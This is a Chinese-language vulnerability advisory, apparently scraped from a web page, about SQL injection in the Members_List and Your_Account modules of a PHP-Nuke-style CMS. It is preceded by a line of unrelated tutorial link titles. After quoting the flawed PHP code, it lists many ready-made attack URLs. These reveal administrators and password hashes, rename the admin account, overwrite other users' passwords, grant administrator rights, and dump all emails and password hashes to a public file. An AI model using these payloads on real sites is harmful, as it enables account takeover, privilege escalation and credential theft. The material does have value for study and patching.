·利用身份证号码提取个人信息·利用Max的Displace再现真实轮胎·返璞归真DOS利用全接触·PS CS3揭密:利用消失点轻松精细化·利用CS2简单几步磨皮·在Word中制作表格 充分利用表格空间·Ubuntu 上利用 subclipse 访问 SVN·也谈利用Ghost的多播功能·充分利用Word中的域·巧用Excel:利用身份证号码 提取个人信
SQL的Members_List、Your_Account模块中存在注入缺陷。如果magic_quotes_gpc选项为“OFF”,攻击者使用下列攻击方法及代码能利用该缺陷: PHP代码/位置:
?/modules/Members_List/index.php : ------------------------------------------------------------------------[...]$count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users ";$select = "select uid, name, uname, femail, url from ".$user_prefix."_users ";$where = "where uname != Anonymous ";if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) {$where .= "AND uname like ".$letter."% ";} else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) {$where .= "AND uname REGEXP \"^\[1-9]\" ";} else {$where .= "";}$sort = "order by $sortby";$limit = " ASC LIMIT ".$min.", ".$max;$count_result = sql_query($count.$where, $dbi);$num_rows_per_order = mysql_result($count_result,0,0);$result = sql_query($select.$where.$sort.$limit, $dbi) or die();echo "<br>";if ( $letter != "front" ) {echo "<table width=\"100%\" border=\"0\" cellspacing=\"1\"><tr>\n";echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._NICKNAME."</b></font></td>\n";echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._REALNAME."</b></font></td>\n";echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._EMAIL."</b></font></td>\n";echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._URL."</b></font></td>\n";$cols = 4;[...]------------------------------------------------------------------------/modules/Your_Account/index.php :switch($op) {[...]case "mailpasswd":mail_password($uname, $code);break;case "userinfo":userinfo($uname, $bypass, $hid, $url);break;case "login":login($uname, $pass);break;[...]case "saveuser":saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);break;[...]case "savehome":savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, $popmeson);break;case "savetheme":savetheme($uid, $theme);break;[...]case "savecomm":savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);break;[...]}------------------------------------------------------------------------/modules/Your_Account/index.php :[...]function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {global $user, $Cookie, $userinfo, $EditedMessage, $user_prefix, $dbi, $module_name;Cookiedecode($user);$check = $Cookie[1];$check2 = $Cookie[2];$result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);list($vuid, $ccpass) = sql_fetch_row($result, $dbi);if (($uid == $vuid) AND ($check2 == $ccpass)) {if (!eregi("http://";, $url)) {$url = "http://$url";}if ((isset($pass)) && ("$pass" != "$vpass")) {echo "<center>"._PASSDIFFERENT."</center>";} elseif (($pass != "") && (strlen($pass) < $minpass)) {echo "<center>"._YOUPASSMUSTBE." <b>$minpass</b> "._CHARLONG."</center>";} else {if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio = FixQuotes($bio); }if ($pass != "") {Cookiedecode($user);sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi);$pass = md5($pass);sql_query("update ".$user_prefix."_users set name=$realname, email=$email, femail=$femail, url=$url, pass=$pass, bio=$bio , user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ, user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig, user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm, newsletter=$newsletter where uid=$uid", $dbi);$result = sql_query("select uid, uname, pass, storynum, umode, uorder, thold, noscore, ublockon, theme from ".$user_prefix."_users where uname=$uname and pass=$pass", $dbi);if(sql_num_rows($result, $dbi)==1) {$userinfo = sql_fetch_array($result, $dbi);
doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);} else {echo "<center>"._SOMETHINGWRONG."</center><br>";}sql_query("UNLOCK TABLES", $dbi);} else {sql_query("update ".$user_prefix."_users set name=$realname, email=$email, femail=$femail, url=$url, bio=$bio, user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ, user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig, user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm, newsletter=$newsletter where uid=$uid", $dbi);if ($attach) {$a = 1;} else {$a = 0;}}Header("Location: modules.php?name=$module_name");}}}[...]function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, $popmeson) {global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;Cookiedecode($user);$check = $Cookie[1];$check2 = $Cookie[2];$result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);list($vuid, $ccpass) = sql_fetch_row($result, $dbi);if (($uid == $vuid) AND ($check2 == $ccpass)) {if(isset($ublockon)) $ublockon=1; else $ublockon=0;$ublock = FixQuotes($ublock);sql_query("update ".$user_prefix."_users set storynum=$storynum, ublockon=$ublockon, ublock=$ublock, broadcast=$broadcast, popmeson=$popmeson where uid=$uid", $dbi);getusrinfo($user);doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);Header("Location: modules.php?name=$module_name");}}function savetheme($uid, $theme) {global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;Cookiedecode($user);$check = $Cookie[1];$check2 = $Cookie[2];$result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);list($vuid, $ccpass) = sql_fetch_row($result, $dbi);if (($uid == $vuid) AND ($check2 == $ccpass)) {sql_query("update ".$user_prefix."_users set theme=$theme where uid=$uid", $dbi);getusrinfo($user);doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);Header("Location: modules.php?name=$module_name&theme=$theme");}}[...]function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax) {global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;Cookiedecode($user);$check = $Cookie[1];$check2 = $Cookie[2];$result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);list($vuid, $ccpass) = sql_fetch_row($result, $dbi);if (($uid == $vuid) AND ($check2 == $ccpass)) {if(isset($noscore)) $noscore=1; else $noscore=0;sql_query("update ".$user_prefix."_users set umode=$umode, uorder=$uorder, thold=$thold, noscore=$noscore, commentmax=$commentmax where uid=$uid", $dbi);getusrinfo($user);doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);Header("Location: modules.php?name=$module_name");}}[...]------------------------------------------------------------------------/modules/Your_Account/index.php :[...]function mail_password($uname, $code) {global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi, $module_name;$result = sql_query("select email, pass from ".$user_prefix."_users where (uname=$uname)", $dbi);if(!$result) {include("header.php");OpenTable();echo "<center>"._SORRYNOUSERINFO."</center>";CloseTable();include("footer.php");[...]------------------------------------------------------------------------------------------------------------------------------------------------[...]function userinfo($uname, $bypass=0, $hid=0, $url=0) {global $user, $Cookie, $sitename, $prefix, $user_prefix, $dbi, $admin, $broadcast_msg, $my_headlines, $module_name;$result = sql_query("select uid, femail, url, bio, user_avatar, user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest, user_sig, pass, newsletter from ".$user_prefix."_users where uname=$uname", $dbi);$userinfo = sql_fetch_array($result, $dbi);[...]------------------------------------------------------------------------
------------------------------------------------------------------------[...]function login($uname, $pass) {global $setinfo, $user_prefix, $dbi, $module_name;$result = sql_query("select pass, uid, storynum, umode, uorder, thold, noscore, ublockon, theme, commentmax from ".$user_prefix."_users where uname=$uname", $dbi);$setinfo = sql_fetch_array($result, $dbi);[...]}[...]------------------------------------------------------------------------
Members_List模块: - 显示用户:http://[target]/modules.php?name=Members_List&letter=All&sortby=pass - 显示用户:http://[target]/modules.php?name=Members_List&letter=All&sortby=uid - 显示moderators :http://[target]/modules.php?name=Members_List&letter= OR user_level=2/* - 显示管理员:http://[target]/modules.php?name=Members_List&letter= OR user_level=4/* - 显示所有以“abc”开头的用户 :http://[target]/modules.php?name=Members_List&letter= OR pass LIKE abc%/* Your_Account模块 : - 将“Admind”用户更名为“Hophophop” :http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,name=Hophophop where uname=Admin/*&uid=[OUR_UID] - 在md5_decrypted中将“Bob”的密码改为“d41d8cd98f00b204e9800998ecf8427e”:http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,pass=d41d8cd98f00b204e9800998ecf8427e where uname=Bob/*&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=saveuser&realname=,pass=d41d8cd98f00b204e9800998ecf8427e where uname=Bob/*&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=saveuser&email=,pass=d41d8cd98f00b204e9800998ecf8427e where uname=Bob/*&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=savehome&storynum=,pass=d41d8cd98f00b204e9800998ecf8427e where uname=Bob/*&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=savehome&ublockon=,pass=d41d8cd98f00b204e9800998ecf8427e where uname=Bob/*&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=savecomm&umode=,pass=d41d8cd98f00b204e9800998ecf8427e where uname=Bob/*&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=savecomm&thold=,pass=d41d8cd98f00b204e9800998ecf8427e where uname=Bob/*&uid=[OUR_UID] - 将普通用户提升至管理员权限:http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,user_level=4&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=saveuser&femail=,user_level=4&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=saveuser&url=http://,user_level=4&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=savehome&broadcast=,user_level=4&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=savecomm&uorder=,user_level=4&uid=[OUR_UID] - 将所有用户的电子邮件和crypted密码保存在http://[target]/AllMailPass.txt中 :http://[target]/modules.php?name=Your_Account&op=mailpasswd&uname=) OR 1=1 INTO OUTFILE /[path/to/site]/AllMailPass.txt/* 利用Cookie发送crypted密码能访问用户帐户。 - 将用户的所有信息保存在http://[target]/admintxt中:http://[target]/modules.php?name=Your_Account&op=login&uname= OR%user_level>1 INTO OUTFILE /[path/to/site]/admin.txt[path/to/site]能在http://[target]/modules/Forums/bb_smilies.php中查询到。